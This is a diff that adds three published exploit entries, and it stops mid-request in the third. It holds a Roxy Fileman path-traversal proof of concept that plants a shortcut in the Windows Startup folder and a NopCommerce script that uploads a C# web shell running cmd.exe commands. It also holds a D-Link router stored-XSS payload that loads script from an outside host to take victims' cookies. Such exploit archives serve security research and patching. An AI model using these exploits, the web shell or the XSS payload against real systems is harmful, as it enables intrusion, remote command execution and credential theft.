diff --git a/exploits/aspx/webapps/47777.txt b/exploits/aspx/webapps/47777.txt new file mode 100644 index 000000000..3e7d71a37 --- /dev/null +++ b/exploits/aspx/webapps/47777.txt @@ -0,0 +1,125 @@ +# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal +# Author: Patrik Lantz +# Date: 2019-12-06 +# Software: Roxy Fileman +# Version: 1.4.5 +# Vendor Homepage: http://www.roxyfileman.com/ +# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net +# CVE: N/A + +Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 +(using custom account as application pool identity for the IIS worker process). + + +=========================== +Description +=========================== +Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on +the IIS worker process privileges. +This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution +of this file will be triggered on the next login. + + +Proof of Concept +=========================== + +It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action. +The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location. +Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case +allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include +the .lnk extension. + +1) Create a shortcut file + +By using for example the target executable C:\Windows\System32\Calc.exe +Remove the .lnk extension and rename it to use the .dat extension. + + +2) Upload the file + +Either upload the .dat file manually via the Roxy Fileman web interface +or programmatically using a HTTP POST request. + +Details of the request: + +POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1 +Host: 127.0.0.1:50357 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------159382831523528 +Content-Length: 924 +Origin: http://127.0.0.1:50357 +Connection: close +Referer: http://127.0.0.1:50357/wwwroot/fileman/ +Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list + +-----------------------------159382831523528 +Content-Disposition: form-data; name="action" + +upload +-----------------------------159382831523528 +Content-Disposition: form-data; name="method" + +ajax +-----------------------------159382831523528 +Content-Disposition: form-data; name="d" + +/wwwroot/fileman/Uploads/test2 +-----------------------------159382831523528 +Content-Disposition: form-data; name="files[]"; filename="poc.dat" +Content-Type: application/octet-stream + +...data omitted... +-----------------------------159382831523528-- + + + +3) Write the file to the Startup folder using the RENAMEFILE action +The new filename is set via the n parameter. The correct path can be identified by trial and error depending +on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe). + +If the necessary directories do not exist, they can be created using the CREATEDIR action which also +is vulnerable to path traversal. + + +POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1 +Host: 127.0.0.1:50357 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 66 +Origin: http://127.0.0.1:50357 +Connection: close +Referer: http://127.0.0.1:50357/wwwroot/fileman/ +Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list + +f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat + + + +Workaround / Fix: +=========================== + +Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: +CREATEDIR, COPYFILE and RENAMEFILE. + +Recommendations for users of Roxy Fileman: + - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default. + + + +Timeline +=========================== +2019-12-06: Discovered the vulnerability +2019-12-06: Reported to the vendor (vendor is unresponsive) +2019-12-11: Request CVE +2019-12-13: Advisory published + +Discovered By: +=========================== +Patrik Lantz \ No newline at end of file diff --git a/exploits/aspx/webapps/47783.py b/exploits/aspx/webapps/47783.py new file mode 100755 index 000000000..a914ab630 --- /dev/null +++ b/exploits/aspx/webapps/47783.py @@ -0,0 +1,79 @@ +# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation +# Author: Alessandro Magnosi (d3adc0de) +# Date: 2019-07-07 +# Vendor Homepage: https://www.nopcommerce.com/ +# Software Link : https://www.nopcommerce.com/ +# Tested Version: 4.2.0 +# Vulnerability Type: Privilege Escalation +# Tested on OS: Windows 10, CentOS, Docker +# Exploit designed for: NopCommerce 4.2.0 on IIS + +import requests +import argparse +from bs4 import BeautifulSoup +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import warnings +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') + +def proxy(flag): + return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None + +def geturl(baseurl, type): + if type == "login": + return baseurl + "/login" + elif type == "mv": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2" + elif type == "mkdir": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common" + elif type == "put": + return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD" + elif type == "contactus": + return baseurl + "/contactus" + else: + return "" + +def login(email, password, url, proxy): + res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False) + cookie = res.cookies.get_dict() + soup = BeautifulSoup(res.text, features="html.parser") + token = soup.find("input", {"name":"__RequestVerificationToken"})["value"] + res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False) + cookies = res.cookies.get_dict() + return { **cookies, **cookie } + +def shellupload(email, password, url, proxy): + print("[+] Trying uploading shell from") + cookies = login(email, password, url, proxy) + # Rename Common Directory + requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Create Common Directory + requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Upload File into Common + requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\nC#:>@cmd\r\n\t\r\n@result\r\n\t\r\nC#:>\r\n
\r\n\r\nEnter your command below:
\r\n\r\n \r\n\t\r\n\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Test if it is working + res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + soup = BeautifulSoup(res.text, features="html.parser") + test = soup.find("span", {"id" : "cmdResult"}) + if test is None: + print("[-] Maybe the target is not vulnerable, or you need to restart the appliance") + else: + print("[+] Shell uploaded under contact us page") + +def main(): + parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce') + parser.add_argument( + '-e', '--email', required=True, type=str, help='Username') + parser.add_argument( + '-p', '--password', required=True, type=str, help='Password') + parser.add_argument( + '-u', '--url', required=True, type=str, help='Base Url of NopCommerce') + parser.add_argument( + '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)') + + args = parser.parse_args() + + shellupload(args.email, args.password, args.url, proxy(args.proxy)) + +if __name__ == '__main__': + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt new file mode 100644 index 000000000..2e690c58e --- /dev/null +++ b/exploits/hardware/webapps/47776.txt @@ -0,0 +1,37 @@ +# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting +# Date: 2019-12-13 +# Exploit Author: Sanyam Chawla +# Vendor Homepage: http://www.dlink.co.in +# Category: Hardware (Wi-fi Router) +# Hardware Link: http://www.dlink.co.in/products/?pid=678 +# Hardware Version: T1 +# Firmware Version: 20.07 +# Tested on: Windows 10 and Kali linux +# CVE: N/A + +Reproduction Steps: +1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] +2. Go to Maintenance page and click on Admin on the left panel +3. Put blind xss Payload in to the name field “>. This payload saved by the server and its reflected in the user page. +4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker. +5. For HTML injection just put Testing in username field, you will get the username bold in your homepage. + +#Burp Intercept + +POST /form2userconfig.cgi HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) +Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 180 +Origin: http://192.168.0.1 +Connection: close +Referer: http://192.168.0.1/userconfig.htm +Cookie: SessionID= +Upgrade-Insecure-Requests: 1 + +username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht +